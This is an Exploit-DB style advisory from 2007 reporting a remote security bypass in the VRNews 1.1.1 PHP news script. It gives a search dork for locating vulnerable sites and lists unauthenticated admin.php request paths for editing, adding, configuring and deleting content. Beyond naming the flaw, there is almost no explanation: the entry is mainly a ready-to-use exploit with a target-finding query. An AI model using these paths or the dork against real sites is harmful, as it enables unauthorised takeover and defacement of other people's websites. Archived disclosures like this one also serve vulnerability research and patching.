VRNews 1.1.1 - 'admin.php' Remote Security Bypass

EDB-ID:

4150


Author:

R4M!

Type:

webapps


Platform:

PHP

Date:

2007-07-05


VRNews v1.x <= /VRNews/admin.php Permission
 
Found by: R4M! - Rami@live.de
 
Dork: intitle:"vrnews v1"
 
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
 
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del

# milw0rm.com [2007-07-05]